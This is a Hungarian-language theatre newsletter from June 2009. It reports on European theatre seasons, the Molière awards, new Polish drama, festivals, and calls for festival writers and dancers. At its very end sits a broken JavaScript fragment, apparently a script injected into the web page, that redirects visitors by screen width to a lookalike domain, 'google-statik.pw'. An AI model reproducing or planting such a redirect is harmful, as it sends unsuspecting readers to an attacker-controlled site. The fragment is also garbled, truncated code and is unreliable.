OSZMI-ITI HÍRLEVÉL 2009. június

OSZMI-ITI HIRLEVEL 2009/5.

 

1. Hirek

 

1.1 A finn Nemzeti Szinhaz programja - 2009. oszi evad

1.2. Kiosztottak a 2009-es Moliere-dijakat

1.3. Az uj lengyel drama

1.4. Marguerite Duras: Az angol szereto

1.5. Theatre Royal Stratford East - rendhagyo program 2012 elso evadara

1.6. Almeida Nyari Szinhazi Fesztival 2009

1.7. Duisburg - 32. Duisburgi Akcentusok Fesztivalja

1.8. A Theatre national de la Colline 2009/2010-es szezonja

1.9. Premieres Fesztival Strasbourgban

 

2. Kortars drama

 

2.1. A 2009-es Moliere-dijazottak darabjai

 

3. ITI Figyelo: Felhivas, palyazat, informacio

 

3.1. Baltic Circle Fesztival - felhivas

3.2. Marrakesh - Nemzetkozi Szinhazi Fesztival

3.3. Nemet tarsulat improvizacios tancosokat keres

3.4. Felhivas - SPIELART Fesztival Munchen

1. Hirek

 

1.1 A finn Nemzeti Szinhaz programja - 2009. oszi evad

 

A finn Nemzeti Szinhaz a 2009-es oszi evadot csaladi darabbal nyitja meg, Rudyard Kipling Dzsungel konyvenek modern adaptaciojaval Jukka Rantanen rendezeseben. Alexander Mork-Eidem uj verzioja a mese cselekmenyet 2069-be helyezi, egy fiktiv, jovobeli varosi dzsungelbe,  paparazzi keselyuk es hajlektalan farkasok lakohelyere.

A hagyomanyokhoz hiven a kortars finn drama 2009-ben is szep szammal kepviselteti magat a finn Nemzeti Szinhaz repertoarjan. Osszel lesz Juha Vakkuri The King's Hands  cimu darabjanak bemutatoja a kisszinpadon, Petteri Sallinen rendezeseben. A belga II. Leopold kiraly udvaraban jatszodo eloadas megmutatja a hasonlosagokat a 19. szazadi gyarmatositas es a modernkori globalis imperializmus kozott. A sved Asa Kalmer vitte szinre Laura Ruohonen legujabb munkajat, a War Tourists cimu sotet farce-ot. A darab azon a tortenelmi tenyen alapul, hogy a Krimi Haboru ideje alatt a 19. szazadban sved tarsasutazasokat szerveztek a Balti-tengerhez, ahol turistalatvanyossag volt, ahogy a brit hajok bombazzak a finn tengerparti varosokat, sot, kulon dijazasert meg a rabokat is etethettek. Maria Kilpi ket generacio kapcsolatarol szolo megindito, minimalista dramaja, a Sore Spot az Omapohja Studioban lathato Minna Nurmelin rendezeseben. A darab a berlini Theatertreffen legjobb kortars uj darabnak jaro dijat nyerte 2007-ben, es meghivast kapott a 2009. augusztusaban megrendezendo Tampere Szinhazi Fesztivalra. Ari-Pekka Lahti legujabb munkajat, a Big Bad World cimu dramat Tuomo Aitta rendezte a Willensauna Szinpadon: het fiatal ferfi kuszkodeserol szol, hogy megtalaljak a helyuket egy egyre inkabb iranyat vesztett vilagban. A nagyszinpadon 2009. februarjaban mutattak be Kari Hotakainen es Juha Lehtola Who's Who cimu, Dosztojevszkijt es Vlagyimir Putyint is felvonultato abszurd szatirajat az irigysegrol, onhittsegrol es a bolcsessegre valo sovargasrol. Szinten februar ota lathato Otso Kautto uj darabja, az apak es lanyok kozotti kapcsolat termeszetet vizsgalo It's a Girl! a Willensauna Szinpadon.

 

1.2. Kiosztottak a 2009-es Moliere-dijakat

 

A francia szinhazi elet jelentos esemenyenek szamit a Moliere-dijak odaitelese, amely az elmult szezon legjelentosebb alkotoit es alkotasait ismerik el, kulonbozo kategoriakban.

Ezek kozul csak nehany dijazottat emelunk ki. A TNP/Villeurbanne Shakespeare Coriolanusa Christian Sciaretti rendezeseben a legjobb kozszolgalati szinhazi eloadas dijat kapta, a legjobb fuggetlen tarsulatnak jaro elismerest a Compagnie Faisan L'Oral et Hardi cimu produkciojanak iteltek meg. A maganszinhazak kozott a Petit Montparnasse-ban jatszott Raymond Depardon-Zabou Breitman Des gens (Az emberek) cimu darabja kapta a Moliere-dijat. A legjobb komedianak jaro dij iden a Cochons d'Inde-nek jart, es az Opera de Sarah - avant l'Amerique (Sarah operaja - Amerika elott) reszesult a legjobb musicalnek jaro meltatasban. Ket dramairo reszesul elismeresben. Jean-Claude Grumberg eddigi munkassagaert es a Vers toi Terre Promise - Tragedie dentaire cimu alkotasaert a legjobb elo francia dramaironak jaro elismerest kapta. David Lescot pedig  az uj dramairo-tehetseg kituntetest nyerte el La Commission Centrale de l'Enfance cimu alkotasaert.

1.3. Az uj lengyel drama

Zbiniew Raszewski nevet viselo Lengyel Szinhazi Intezet, amelyet 2003-ban alapitott az ottani kulturalis miniszterium, a kortars dramat bemutato kiadvanyaban a lengyel dramairas legfrissebb iranyzatairol, alkotoirol ad informaciot. Roman Pawlowski tanulmanyaban attekinti a lengyel szinhaz 1980-90-es eveit, amikor nagyon gyors valtozasok mentek vegbe a tarsadalomban, s ekkor kerulhetett szinre a nagy mesterek, Mrozek, Glowacki, Rozewicz, Schaeffer, Slobodzianek szamos darabja.

A dramairo es filmrendezo Marek Koterski-nek a keso 80-as evekben szuletett dramaiban volt eloszor tettenerheto a dramai nyelvezet megvaltozasa. Adam Miauczynski, Koterski darabjainak anti-hosenek mindenfele emelkedett torekvese banalitasokba sullyed. Van nehany romlott foga, egy Fiat 126-osa, egy lakotelepi lakasa Lodzban, amelyen elvalt felesegevel osztozik, s kozben az az ambicio hajtja, hogy nagy rendezo, jelentos iro legyen. Kenyeret azonban a nagyon utalt tanitassal keresi. Bar Koterski darabjainak szemelyes, oneletrajzi indittatasa is van, alapvetoen mely tarsadalmi problemat erintenek: ez az ertelmisegi ethos szetesese. Az elnyomas eveiben a lengyel ertelmisegre kulonos nyomas nehezedett, megpedig a lengyel nemzet politikai es szellemi vezetojekent jatszott szerepet, amelyet a megvaltozott korulmenyek kozott a szellemi elit szinte teljesen elvesztett. Koterski eppen ezt fogalmazza meg alkotasaiban, valamint azt, hogy ezt a reteget hogyan keriti hatalmaba a penz uralma.

Grzegorz Nawrocki, ujsag- es dramairo ahhoz a generaciohoz tartozik, amelyik a nepi demokraciaban nott fel. Muveiben egyaltalan nem a mult fele fordul, hanem az uj realitas kerdesei izgatjak, s ezek kozul is a fiatalok kozti eroszakossag. Az 1995-ben irt Mloda smierc (Korai halal) cimu darabjaban a tizenevesek inditek nelkul elkovetett gyilkossagairol szol, akik nemcsak a rokonaikat gyilkoljak le, hanem a veletlenul utjukba kerulo embereket is. A darab a rendezoket arra osztonozte, hogy elhagyjak a konvencionalis szinhazi tereket, es ott mutassak be, ahol eppen ez a korosztaly szorakozik, peldaul discoban, klubokban. Ez az elso olyan darab, amely elinditja az uj-realista dramat Lengyelorszagban

Ingmar Vilquist felvett nev, es egy muveszettorteneszt rejt. Az 1999-ben indulo dramairo az amerikai es skandinav pszichologiai dramakbol inspiralodott, elsosorban Ibsen, Strindberg, Tennessee Williams darabjaibol. Hosei csak felig megertett Idegenek, akiket mentalis fogyatekossaguk miatt kikozositettek a tarsadalombol. Bar a szerzo folyamatosan atlepi a hatart a valosag es a tortenelemi kontextus kozott, de ez az 1989. utani Lengyelorszagban alapveto kerdes, problema, mivel az idegengyulolet egyre erosodik ebben az orszagban is. A politikai reformok atalakitottak az addig homogennek szamito tarsadalmat individuumok demokratikus kozossegeve, ezert a partvonalra sodrodas is erosodott, a kisebbsegek elorukkoltak, es mindez jelentos konfliktusokat hozott. Noc Helvera c. darabjaban vagy Beztlenowce c. egyfelvonasosaban tolerancia es intolerancia hatarait fogalmazza meg.

A legfiatalabb generacio 2000 tajan jelent meg, s ekkor a dramak hangvetele, stilusa, a dramak bemutatasa radikalisan megvaltozott. Azota szinte minden evben uj nevek bukkannak fel, uj bemutatokat tartanak. A hetvenes, nyolcvanas evekben szuletett muveszek mar a kapitalizmus gyermekei, nagyon kulonbozo tarsadalmi retegbol erkeztek, es szamukra '68 vagy '81 a regmult tortenelmehez tartozik. Muveikben egyaltalan nem fordulnak a mult fele, hanem inkabb a jelen gondjainak megfogalmazasa erdekli oket: a csaladok valsaga, szethullasa, az eroszakhullam fenyegetese, a fogyasztoi tarsadalom es az erzelmi kotelekek lazulasa adjak a dramak temait.  

Szamos, 2000 utan letrejott intezmeny is segiti a fiatal szerzok darabjainak bemutatasat, tobbek kozott az ottani dramafesztival vagy a varsoi Laboratorium Dramatu vagy a Nemzeti Szinhaz felolvasoszinhaza. Mi a kozos az ezeken a helyeken bemutatott dramak kozott? Elsosorban az, hogy kerulik a realista stilust, a konvencionalis formakat, a szimbolizmust, viszont gyakran tamaszkodnak dokumentumokra, s nyelvhasznalatukban sokszor a sokkolas, retegnyelvek jelennek meg. Hoseik vagy gazdasagi vagy moralis okokbol kikozositett emberek: homoszexualisok, hajlektalanok, prostitualtak. Ebbe a csoportba tartozo irok kozul a tanulmany iroja Przemyslaw Wojcieszk, Pawel Sala, Robert Bolesto nevet emeli ki. 2002-2005 kozott Gdanskban a Wybrzeze Szinhaz Pawel Demirski otletet valositotta meg: Fast Urban Theatre cimmel, amely interjukra epulo dokumentarista eloadasok sorozata volt.

A Varsoban mukodo Laboratorium Dramatu elsosorban a neorealista iranyzatu darabokat reszesiti elonyben.

Az uj lengyel drama eltavolodik a hagyomanyos, linearis narraciotol, a jol definialhato hosoktol. Az ebbe a csoportba tartozo dramairok a posztmodern szinhazi elkepzelesekre tamaszkodnak, lazaszovesu, fragmentumokra epulo, befejezetlen, szaggatott dialogusokat irnak. Ezt a technikat elsosorban a varsoi Rzmaitosci Theatre kore csoportosulo irok alkalmazzak, tobbek kozott Szymon Wroblewski, Michal Bajer, Dorota Maslowska.

 

1.4. Marguerite Duras: Az angol szereto

 

Marguerite Duras: Az angol szereto cimu darabjat Marie-Louise Bischofberger rendezeseben mutatta be a Theatre de la Madeleine, parades szereposztasban, a nyolc ev kihagyas utan szinpadra lepo Ludmila Mikael, Ariel Garcia-Valdes es Andre Wilms jatsszak a szerepeket.

Duras mindig is nagy lelkesen olvasta a bunugyi rovatokat, a gyilkossagi hireket, es fokent az erdekelte, mi lehetett az elkovetok inditeka. 1985-ben nemikeppen elvesztette a fejet, amikor Christine Willemint dicsoitette, akit sajat fia meggyilkolasaval gyanusitottak.

Amelie Rabilloux  tortenete volt az inspiracio igazi forrasa. 1949-ben ez a no megolte a ferjet, majd feldarabolta, es a testreszeket kulonbozo helyeken rejtette el. Amikor letartoztattak, azonnal bevallotta tettet. A targyalasrol 1952-ben a Le Monde is beszamolt, s arrol is, hogy az asszony keptelen volt magyarazatot adni arra, miert darabolta fel a ferjet. Duras eloszor regenyt irt ebbol, amely 1967-ben jelent meg. Ezutan szuletett meg a szindarab, amelyet 1976-ban mutattak be Madelaine Renaud, Pierre Dux es Michel Lonsdale foszereplesevel, Claude Regy rendezeseben.

Az eredeti tortenetbol Duras a megmagyarazhatatlan inditeku buntenyt allitja muvei kozeppontjaba. A foszereplono, Claire Lannes nem a ferjet oli meg, hanem siketnema unokahugat, aki vele egy fedel alatt elt, es nem arulja el, hogy hova rejtette el a fejet. Az ot faggato szereplo nem pszichologus, nem ugyesz, nem ugyved, hanem olyan valaki, aki az inditekra kivancsi, azt akarja megerteni. Eloszor a ferjet faggatja, akit egyaltalan nem lep meg a bunteny. Ugy beszel sajat felesegerol, ahogy egy ismeretlenrol szoktak. Elmondja, hogy mindig voltak szeretoi, de feleseget soha nem hagyta el, mellette maradt, mert az asszony soha semmit se kerdezett tole. Mindenkit egy dolog erdekel igazan: mi lett az aldozat fejevel, ez viszont Claire Lannes-t nem izgatja. Hiaba faggatjak, bune megfoghatatlan, erthetetlen marad, s mindez csak azert alakul igy, mert senki sem kepes feltenni neki a „jo" kerdest, amire valaszolni tud.

 

1.5. Theatre Royal Stratford East - rendhagyo program 2012 elso evadara

A Theatre Royal Stratford East 2012. januarjatol 6 honapig a kozonsegre bizza musoranak kialakitasat a londoni Olimpia elott. Eloszor fordul elo a rendhagyo eset, hogy egy komoly londoni koszinhaz szabad kezet ad a publikumnak egy teljes evad musortervenek meghatarozasaban, beleertve a harom vagy negy bemutatando darab es a nekik szant helyszin kivalasztasat. A Stratford East muveszeti vezetoje, Kerry Michael ijesztonek, de izgalmasnak talalja a kezdemenyezest, aminek nagy szerepe lehet mind muveszeti szempontbol, mind a kozonsegformalas es marketing teruleten. 

 

 

1.6. Almeida Nyari Szinhazi Fesztival 2009

 

A londoni Almeida bejelentette 2009-es, julius 8-tol augusztus 1-ig tarto nyari fesztivalprogramjat. A hires szinhaz negy elvonalbeli tarsulatot hivott meg a vilag minden tajarol (Yorkshire-tol New Yorkig), hogy megismerhessuk a legfrissebb ujito szinhazi torekveseket. Julius 8. es 12. kozott tekintheto meg a Last Seen a Slung Low eloadasaban, amit az a teny ihletett, hogy evente mintegy 200.000 ember tunik el nyomtalanul. Julius 16-tol 19-ig kerul sor a TEAM The American Capitalism Projectjere, majd a GULP Or Nearest Offerjere, ahol minden elado. Agyak, mobilok, almok es csecsemok. Elado, elkelt. Az eloadas arra keresi a valaszt, mi tortenik akkor, ha mindenunket eladtuk. Julius 29. es augusztus 1. kozott lathato a Tiata Fahodzi, egy londoni allami korhaz kortermeiben jatszodo zimbabwei thriller.

 

 

1.7. Duisburg - 32. Duisburgi Akcentusok Fesztivalja

Duisburgban rendeztek meg 2009. aprilis 24. es majus 10. kozott a 32. Duisburgi Akcentusok Fesztivaljat (Duisburger Akzente), ami a kortars torok szinhaz, tanc, zene, irodalom es kepzomuveszet kiemelkedo eredmenyeit hozza el Nemetorszagba. A nyolcvannal is tobb programot felvonultato kulturalis esemenyt Yesim Ozsoy es Genco Gula Surname 09 cimu szabadteri performanszaval nyitottak meg a duisburgi Konig-Heinrich-Platzon. A szinhazi talalkozon kilenc nemet es torok szinhazi produkcio vesz reszt, koztuk a Munich Kammerspiele Schnee (Ho) cimu eloadasa, ami Orphan Pamuk azonos cimu regenyen alapul. A musorban szinten szerepel a Sivas 93 Genco Erkal rendezeseben. A darab az 1993-as tragedia dokumentarista feldolgozasa, amikor az anatoliai Sivas varosaban 37 ember bent egett egy hotelben, mikozben vallasi fanatikusok egy kulturalis fesztival ellen tuntettek.

 

1.8. A Theatre national de la Colline 2009/2010-es szezonja

 

A 45 eves Stephane Braunschweig, a Theatre de la Colline uj igazgatoja majus 11-en ismertette a kovetkezo szezon programjat. Az igazgato-rendezo korabban nagyon sikeresen iranyitotta a Theatre national de Strasbourg-ot. Braunschweig mar korabban is sokszor rendezett ebben a legfiatalabbnak szamito nemzeti szinhazban, amelynek arculatat ket elodje, Jorge Lavelli es Alain Francon alakitotta ki, es tette a kortars szinhaz otthonava. Az uj igazgato folytatni kivanja az o munkajukat, bar Alain Franconhoz kepest o a hangsulyt nem elsosorban a dramairok, dramak felfedezesere helyezi, hanem a rendezesre, pontosabban a rendezes es az dramak szimbiozisara. Ennek jegyeben hivta meg Sylvain Creuzevault tarsulatat. A 2009-2010-es szezont a „hosiesseg es a radikalitas alma" tema kore szervezi. Ezt azert tartja fontosnak, mert igy akarja vilagossa tenni a kozonseg szamara, hogy milyen tipusu szinhazat akar csinalni, hogy a nezo tudja, mire szamithat. Braunschweig a radikalitas ertelmezese, elemzese jegyeben ket Ibsen darabot rendez, a Babahazat es a Rosmersholmot. Minden szezonban meghiv egy kulfoldi rendezot, akitol bemutat egy, a sajat orszagaban rendezett eloadast, es felkeri, hogy francia szineszekkel mutasson be egy darabot. Az elso szezonban a vendeg a nemet Michael Thalheimer lesz.

 

 

1.9. Premieres Fesztival Strasbourgban

 

A Theatre National Strasbourg es a Maillon Szinhaz otodik alkalommal szervezi meg  a fiatal europai rendezok fesztivaljat, amelyen negy napon keresztul 2009. junius elejen 8 orszagbol tiz eloadast mutatnak be. Nemetorszagbol, Bulgariabol, Franciaorszagbol, Nagy-Britanniabol, Olaszorszagbol, Romaniabol, Szerbiabol es Svajcbol latnak vendegul produkciokat.

A 2004-ben alakult olasz Compagnie Muta Imago (a+b)3 cimu eloadas egy szorakozni vagyo, gondtalan par izgatott keszulodesenek bemutatasaval indul, de eletuket a haboru megvaltoztatja, es a jol felepitett optimizmusuknak vege szakad. Kimondatlan, elharapott szavaikkal tonkreteszik intim kapcsolatukat. A minimalista eloadas egy emberi kapcsolat es a tortenelem viszonyat kivanja feldolgozni.

Dobromir Tzvetkov fiatal bolgar rendezo, aki 2008-ban vegzett a szofiai szinmuveszetin. Buchner: Danton halala cimu darabjat dolgozta at es rendezte meg. Az eredeti mubol csak az alapszereploket tartotta meg : Desmoulins, Robespierre, Saint-Just es termeszetesen Danton figurajat.

Roman-francia koprodukcioban jott letre a roman, de a TNS iskolajaban vegzett Elena Castelian eloadasa, a Transit, amely egyfelol a Ceausescu par « pererol » es kivegzeserol szol, pontosabban a kollektiv es szemelyes emlekezet konfrontaciojarol. A jatekter ket reszbol : egy tanterembol, amely a gyerekkori elmenyek szintere es a « per » szinterebol all.

Boris Vian :Tajtekos napok cimu muvet a nemet Alexander Riemenschneider adaptalta es rendezte. Az 1981-ben szuletett muvesz zenei es irodalmi tanulmanyokat folytatott, mielott a Theaterakademie Hamburg rendezoi szakara iratkozott be.  A fesztivalon lathato eloadasat is a hamburgi szinmuveszetin mutatta be.

Szerb-holland koprodukcio Sanja Mitrovic eloadasa, a Will you be ever happy again? , amely a gyerekkori emlekekre epul es arra keres valaszt, hogy milyen lehet az egyen kapcsolata  nemzete tortenelmevel, amellyel nem ohajt azonosulni, mi a viszonya az egyennek a kollektiv identitashoz.

Nagy-Britanniat az  ?lysteri Ubsberg Brager es Philip Thorne-rendezte ket Heiner Muller darab eloadasa kepviseli, Franciaorszagot pedig a TNS novendekekent vegzett Matthieu Roy szerelmi viszonyokat bemutato eloadasa. Egy masik francia produkcioban Pessoa nyoman keszult adaptacio L'Etranger (Idegen) cimmel kerul bemutatasra Pierre Talleron  rendezeseben.

 

2. Kortars drama

 

2.1. 2009-es Moliere-dijazottak darabjai

 

Jean-Claude Grumberg 1939-ben szuletett Parizsban. Tobb mint husz szindarab szerzoje, az utobbi nehany evben egyre tobb gyerekeknek szolo szinmuvet irt, Le Petit Violon /1995/, Marie des grenouilles /2003/, Iq et Ox /2003/, Le Petit Chaperon Uf /2004/, Mange ta main /2004/, Pinok et Barbie /2005/.

 

Vers toi Terre Promis - Tragedie dentaire (Utban az Igeret Foldje fele - fogaszati tragedia)

 

Szereplok: 4 no, 2 ferfi

 

Egy kisfiu narrator emlekezik vissza arra az idore, amikor edesanyja a masodik vilaghaboru utan gyakran vitte fogorvoshoz ot. Fajdalomra fajdalom a valasz. A fogorvos es felesege, Charles es Clara Spodek epphogy tuleltek a masodik vilaghaborut, de ket lanyuk elvesztese merhetetlen, megemeszthetetlen fajdalommal tolti el oket. A gorog tragediakbol ismert korus vezeti be a nezoket Spodek doktor rendelojenek intimitasaba. A narrator szerepet egy kisfiu tolti be, aki feleleveniti a fogorvosi rendeloben latottak emlekeit, es igy osszekoti a jelent es a multat.

A darab a masodik vilaghaboru nepirtasa utan szeteso csaladrol szol, az ujrakezdes fajdalmarol, a felejteni keptelen emberekrol, sok erzelemmel es gyenged humorral. A darabot Charles Tordjman rendezte Aix-en-Provence-ban 2008. novembereben, majd ezt kovetoen az eloadas Nancyban, Montpellier-ben, Parizsban, Tel Avive-ban turnezott.

 

 

David Lescot (1971) dramairo, rendezo, zenesz. Szamos szinpadi zenet alkot, tobbek kozott Anne Torres szamara. Elso darabjat 1998-ban irta. A Theatre de la Ville-ben (Parizs maga rendezte  Un homme en faillite (Becsodolt pasas) c. darabjat. A 'Europeenne (eu) cimu muveert 2008-ban az SACD fiatal dramairo tehetsegnek jaro dijat valamint a Dramairodalom nagydijat kapta meg. A darabot az Uj Szinhaz megbizasabol Bognar Robert forditotta le.

A fiatal dramairo tehetsegnek jaro Moliere-dijat La Commission Central de l'Enfance ert nyerte el.

 

La Commission Central de l'Enfance

 

A szerzo a kovetkezoket irja darabjarol: „Gyerekkent a nyari vakaciokat a francia kommunista zsidok altal alapitott Commission Centrale de l'Enfance taboraban toltottem.  Ez a szervezet eredetileg a masodik vilaghaboruban eltunt gyerekek megsegitesere jott letre, es egeszen 1980-ig mukodott. Apam is ide jart. Erre akartam visszaemlekezni, minden nosztalgia nelkul, es tortenet-toredekek segitsegevel feleleveniteni ezt a tortenetet, amelyben neha zavarosan, neha tudattalanul jelen volt a politikai lelkiismeret, tudatossag, a remennyel valo visszaeles, a szigoru szabalyok, a mindenek folotti ideologia,  az erzekek ebredesenek gondja, baja. Ezekbol alkottam egyfajta epikus, ritmizalt, enekelt poemat... Igy szuletett meg ez a minimalista „cabaret", egy hangra, de amely tobb hangot, tortenetet olvaszt magaba."

 

 

3. ITI  Figyelo: Felhivas, palyazat, informacio

 

3.1.  Baltic Circle Fesztival - felhivas

 

A 2009. november 18. es 22. kozott megrendezendo 6. Baltic Circle Fesztival Mobile Lab professzionalis resztvevoket keres az irok csapataba. A szovegek a Baltic Circle DramAgora nethirleveleben jelennek majd meg. A sikeres palyazok szallast kapnak, es ingyenesen vehetnek reszt a szinhaz minden programjan.

Elvarasok:

  • Magas szakmai szinvonal
  • Min. 2 szoveg a fesztivalprogramrol angol nyelven
  • A fesztival alatt publikalhato, kesz szovegek
  • 2009. oktober 15-ig project leiras

 

Jelentkezes: This e-mail address is being protected from spambots. You need JavaScript enabled to view it

                     This e-mail address is being protected from spambots. You need JavaScript enabled to view it

 

3.2.  Marrakesh - Nemzetkozi Szinhazi Fesztival

 

2009. november 3. es 7. kozott rendezik meg Marrakesh-ben a 3. Nemzetkozi Szinhazi Fesztivalt. Ebben az evben olyan szinhazak, tarsulatok, tancosok, tanctarsulatok jelentkezeset varjak, akik a szinhazi falakon kivul, koztereken, nyilvanos helyeken, utcan valositjak meg az eloadasukat, es uj tipusu kapcsolatok teremtesere torekednek a kozonseggel. A palyazni kivano produkciok DVD-jet 2009. junius 30-ig kell bekuldeni.

 

Tovabbi informacio: www.theatreacadema.sitemaroc.com

 

3.3. Nemet tarsulat improvizacios tancosokat keres

   
 A nemet Hebbel am Ufer tarsulat tancosokat keres a 2009. augusztusaban a berlini Tancfesztivalon bemutatando eloadasahoz. (Dance Europe Magazine)
A berlini Hebbel am Ufer tarsulat 25 tancost keres a "Testek a varosi terekben" (Bodies in Urban Spaces) cimu, Willi Dorner koreografiajaval szinpadra kerulo eloadashoz. A sikeres palyazok tapasztaltak a paros improvizacios mozgasmuveszet teren, es jo akrobatikus erzekkel rendelkeznek. Az eloadast 2009. augusztus 21-en es 22-en mutatjak be a berlini Tancfesztivalon. A felveteli probatancot 2009. junius 16-an tartjak a nemet fovarosban, a probakat 2009. augusztus 14. es 20. kozott rendezik.

Bovebb informacio:

Hebbel am Ufer; Stresemannstr. 29, 10963 Berlin, Deutschland - Anna Wagner

E-mail: This e-mail address is being protected from spambots. You need JavaScript enabled to view it

Telefon: +49 30 25 90 04 75

     

3.4. Felhivas - SPIELART Fesztival Munchen

A muncheni SPIELART Fesztivalt 2009. november 19. es december 5. kozott rendezik. 6 fo jelentkezeset varjak, akik csatlakoznak a Mobile Lab csapathoz november 26. es 29. kozott. A cikkek a www.spielart.org weboldalon fognak megjelenni. A fesztival valamennyi eloadasara es programjara ingyen belepest, valamint 3-4 napi szallast biztositanak.

Elvarasok:

  • magas szintu szakmai hozzaallas
  • Min. 2 szoveg
  • Egy eloadas utani vita moderalasa

Tovabbi informacio: This e-mail address is being protected from spambots. You need JavaScript enabled to view it

 

Keszitettek: Lakos Anna (szerk.), Rakoczy Anita

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width